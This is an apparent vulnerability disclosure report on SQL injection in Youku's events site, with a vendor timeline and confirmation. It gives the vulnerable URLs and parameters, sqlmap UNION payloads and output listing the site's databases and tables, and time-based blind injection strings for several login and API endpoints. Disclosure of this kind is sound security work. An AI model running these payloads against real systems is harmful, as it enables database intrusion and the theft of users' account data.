2014-03-01: 细节已通知厂商并且等待厂商处理中 2014-03-01: 厂商已经确认,细节仅向厂商公开 2014-03-11: 细节向核心白帽子及相关领域专家公开 2014-03-21: 细节向普通白帽子公开 2014-03-31: 细节向实习白帽子公开 2014-04-15: 细节向公众公开
优酷某活动站注入,大量参加活动的用户帐号信息泄露。== 叫你们想占便宜
注入点:events.youku.com/2011/pepsihappyness/api/?act=my_ecards&page=1&pagesize=4&pageslists=%23ecards_pageslists&pagesturn=%23ecards_pagesturn&url=api/%3Fact%3Dmy_ecards%26uid%3D34853&uid=1注入参数:uid
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: uid Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#---available databases [3]:[*] db_events[*] information_schema[*] testsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: uid Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#---Database: db_events[233 tables]+--------------------------+| 7up_user || adidas_2010_football || adidas_2011_tvc_info || adidas_comments || aveo_clicks || aveo_comments || aveo_users || bosideng_1024_users || bosideng_code || bosideng_fake_users || bosideng_photos || bosideng_users || bosideng_video_vote_logs || bosideng_videos || bosideng_vote_logs || bsd_kpi_email || bsd_kpi_user || bsd_rt_log || bsd_user || bugles_videos || casesharing_2013 || cgirl2014_awards || chengxin_news || chery_comments || chery_photo_vote_logs || chery_photos || chery_users || chery_video_vote_logs || chery_videos || cityshow_comment || cityshow_data || cityshow_member || clear_game_log || clear_log || clear_rt_log || clear_users || crowneplaza_register || deyi_tickets_users || dove_user || dove_video || etam_comment || etam_txt || fiesta_2011_guestbook || fm_dream || fm_kpi_member || fm_number || fm_number_bak || fm_number_t || fm_number_test || fm_support_log || fm_user || fm_vote_log || fm_work || global_accounts || global_china || global_files || global_minisites || global_testing || global_units || greetingcard_params || gucci_comments || gucci_rt_logs || gucci_users || hkdl_users || ht_config || ht_guest || ht_user || htc_config || hvsop2013_awards || hvsop_comments || hvsop_live_email || hvsop_resumes || hvsop_users || hvsop_videos || hvsop_vote_logs || icedew_videos || jasmine_comments || jw2ask_marked || jw2ask_plans || jw2ask_questions || jw2ask_same_q || jw2ask_top30_grade_logs || kohler_comments || kohler_mm_awards || kohler_photo_vote_logs || kohler_photos || kohler_prize_logs || kohler_users || kohler_video_vote_logs || kohler_videos || lee_moment_photos || lee_moment_votelog || levis_data || levis_logs || levis_win || loreal_flash_ad || mabelline_users || mamonde_2013_videos || market_huanzhu_votes || marketing_apply_info || marketing_darenxiu || marketing_fashion || marketing_jianjiancao || marketing_kfc_avatar || marketing_kfc_cms || marketing_laifushi || marketing_upload_info || mql_award || mql_seckill || mql_seckill_bak || mql_seckill_log || nikegz_comments || nikegz_image || nikegz_pks || nikegz_videos || nivea_answer_logs || nivea_awards || nivea_final_awards || nivea_photos || nivea_question || nivea_users || nivea_vote_logs || onstar_regist || onstar_video || oreo_images || oreo_videos || pepsi_comments || pepsi_ecards || pepsi_media || pepsi_users || pepsi_videos || pepsi_vote_logs || pepsicny_videos || qingyang_comment || qingyang_videos || remyvsop_banner || remyvsop_comment || remyvsop_mobile || remyvsop_news || remyvsop_register || remyvsop_teams || remyvsop_videos || ricola_pincode || ricola_tickets || roewe_comment || roewe_config || roewe_guess || roewe_player || roewe_user || scj_users || sprite_users || sprite_videos || superb_comments || superb_comments_bak || superb_videos || sww_2011_users || sww_2011_videos || unit_cachedata || unit_comments || unit_misc || unit_news || unit_users || unit_videos || unit_visitors || unit_voting || vichy2013_awards || vichy2013_winners || videos_bak || vsop_email || vsop_live_mobile || vsop_loop_videos || vsop_lyp || vsop_users || vsop_videos || vsop_vote_email || wtcc_2011_guestbook || wtcc_2011_shots || wtcc_2011_users || wzmt_awards || wzmt_awards_bak || wzmt_seckill || wzmt_seckill_log || z_acer_user || z_bwnzb_user || z_eleven_user || z_fanta || z_fanta_email || z_ferrari || z_ferrero_user || z_huggies || z_huggies_comments || z_k3 || z_k3_user || z_k3_v || z_lenscrafter_pic || z_lenscrafter_user || z_loreal || z_market_disney || z_market_topchef || z_proya2011_100 || z_proya2011_code || z_proya2011_mblog || z_proya2011_pic || z_proya2011_user || z_proya2011_v2_pic || z_proya2011_v2_user || z_proya_pic || z_proya_user || z_remyclub_comment || z_remyclub_user || z_riich_user || z_sdeer_user || z_sepb_user || z_sgm15th || z_volvo || z_wp_code || z_young || z_z_comment || z_z_contact || z_z_contact2 || z_z_email || z_z_img || z_z_luck || z_z_module_luck || z_z_p || z_z_txt || z_z_txt_vote || z_z_v || z_z_vote || z_z_vote_id || z_z_vote_ip || zhijue_users || zqbb_videos |+--------------------------+
呵呵,还有几个post注入点,但是用常用工具无法注出结果,但通过时间延迟可以确定存在。http://events.youku.com/bwnzb/api/_login.phpuname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=ehttp://events.youku.com/bwnzb/phase-2/api/_login.phpuname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=ehttp://events.youku.com/familymart/api/?q=ajax/doSupporttype=(select(sleep(3))v)&work_id=24526或者type=test&work_id=(select(sleep(3))v)附送一个phpinfohttp://events.youku.com/2010/wtcc/phpinfo.php
危害等级:中
漏洞Rank:10
确认时间:2014-03-01 20:08
多谢提醒,马上修复
暂无
